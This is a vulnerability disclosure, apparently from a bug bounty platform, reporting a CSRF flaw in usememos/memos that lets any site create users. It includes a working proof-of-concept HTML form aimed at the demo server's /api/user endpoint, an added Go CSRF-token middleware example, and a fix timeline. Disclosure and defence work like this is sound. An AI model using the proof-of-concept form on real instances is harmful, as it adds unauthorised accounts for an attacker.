Cross-Site Request Forgery (CSRF) in Add Users in usememos/memos

Valid

Reported on Dec 28th 2022


Description

Hello Team,

The create-member functionality is vulnerable to a CSRF attack; by exploiting the CSRF vulnerability, an attacker can add new members.

<html>

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/user" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;corry&quot;&#44;&quot;password&quot;&#58;&quot;corry&quot;&#44;&quot;role&quot;&#58;&quot;USER&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC video: https://drive.google.com/file/d/1dN2ug8qjwbz1CGbfuBldwam_IFE4BNyH/view?usp=sharing

Fix: I just want to suggest that you set a CSRF token.

Impact

An attacker can add new members in the portal by exploiting the CSRF issue.
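
The form in the report works because a cross-site HTML form can send a `text/plain` body that parses as JSON, but it cannot set a custom request header. The following is an added example of the suggested token check, not code from usememos/memos and not the fix in the referenced commit: a Go `net/http` middleware doing a double-submit check. The cookie name `csrf_token`, the header `X-CSRF-Token`, and the helper `status` are assumptions made for illustration, and the server is assumed to have issued the random cookie value at login.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Hypothetical cookie and header names chosen for this example.
const csrfCookie, csrfHeader = "csrf_token", "X-CSRF-Token"

// csrfGuard rejects state-changing requests unless they declare a JSON body and
// echo the CSRF cookie in a custom header, which an HTML form cannot set.
func csrfGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions {
			next.ServeHTTP(w, r)
			return
		}
		mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
		if err != nil || mt != "application/json" {
			http.Error(w, "unsupported content type", http.StatusUnsupportedMediaType)
			return
		}
		c, err := r.Cookie(csrfCookie)
		if err != nil || c.Value == "" || subtle.ConstantTimeCompare([]byte(c.Value), []byte(r.Header.Get(csrfHeader))) != 1 {
			http.Error(w, "CSRF token mismatch", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// status sends a constructed POST /api/user through the guard and returns the HTTP status code.
func status(contentType, cookieTok, headerTok string) int {
	body := strings.NewReader(`{"username":"corry","password":"corry","role":"USER"}`)
	req := httptest.NewRequest(http.MethodPost, "/api/user", body)
	req.Header.Set("Content-Type", contentType)
	req.Header.Set(csrfHeader, headerTok)
	req.AddCookie(&http.Cookie{Name: csrfCookie, Value: cookieTok})
	rec := httptest.NewRecorder()
	created := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusCreated) })
	csrfGuard(created).ServeHTTP(rec, req)
	return rec.Code
}

func main() { fmt.Println(status("text/plain", "tok", ""), status("application/json", "tok", "tok")) }
```

The first call models the form submission from the report (cookie attached by the browser, `text/plain` body, no custom header) and is refused; the second models the application's own client and is accepted.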

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Anil Bhatt modified the report a year ago
Anil Bhatt modified the report a year ago
STEVEN validated this vulnerability a year ago
xo19do has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago